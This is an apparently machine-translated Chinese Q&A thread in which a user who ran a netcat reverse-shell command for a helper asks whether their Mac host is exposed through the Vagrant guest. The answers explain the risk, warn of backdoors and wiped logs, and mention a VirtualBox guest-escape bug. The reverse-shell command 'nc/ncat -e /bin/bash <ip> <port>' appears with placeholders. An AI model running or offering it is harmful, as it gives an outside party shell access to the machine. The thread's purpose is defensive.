有人在帮我解决流浪服务器上的问题。他能够通过以下方式访问 shell(我用他的 ip 和端口为他运行了它):
nc <ip> -e /bin/bash <port>
我以前从未遇到过这种情况,但它似乎很有趣。
我的主机是Mac。他有可能通过 vagrant guest 访问我的 mac 吗?
我可能应该销毁并重新创建流浪盒,对吗?
有人在帮我解决流浪服务器上的问题。他能够通过以下方式访问 shell(我用他的 ip 和端口为他运行了它):
nc <ip> -e /bin/bash <port>
我以前从未遇到过这种情况,但它似乎很有趣。
我的主机是Mac。他有可能通过 vagrant guest 访问我的 mac 吗?
我可能应该销毁并重新创建流浪盒,对吗?
我假设你的意思是:
ncat -e /bin/bash <ip> <port>
该参数在建立连接时-e
启动命令。/bin/bash
然后该命令连接到 IP 并执行 bash 以供远程用户进行交互。远程用户获得启动用户所拥有的任何特权。一旦该命令被终止,连接也随之终止。在那里持久连接没问题。
但真正的问题是那个人在你的 vagrant box 上做了什么......他可能已经设置或安装了后门,或者其他东西来建立持久连接。
您可以检查会话的历史文件以查看他做了什么,或者如果您无法验证他的操作,则重新构建该框。
Netcat 是用于读取/写入 TCP/UDP 连接的基本网络工具。在您给出的示例中,您告诉它跨 TCP 运行由 -e 指定的程序到远程计算机和端口号。在那个特定的例子中,你正在向他的机器发送一个 bash shell,大概他有一个 netcat 监听器在等待。
Netcat 是真正的网络瑞士军刀。你可以用它做很多事情。你可以:
这是一个非常强大的工具。
要回答您关于他是否可以使用它来访问您的 mac 的问题:不是它本身。您必须启动反向外壳回到他的盒子。没有你发送外壳,他永远无法连接。但是,在连接后,他将能够植入后门以进行持久访问。
具有任何技能的攻击者都会清理他的会话(和系统)日志,因此您甚至不能相信那些能够说出所发生事情的真相。您能做的唯一真正安全的事情就是擦拭盒子。
报告了一个漏洞,攻击者可以通过 3D 加速突破 Virtualbox 来宾并获得对主机操作系统的访问权限。
这需要为来宾操作系统启用 3D 加速。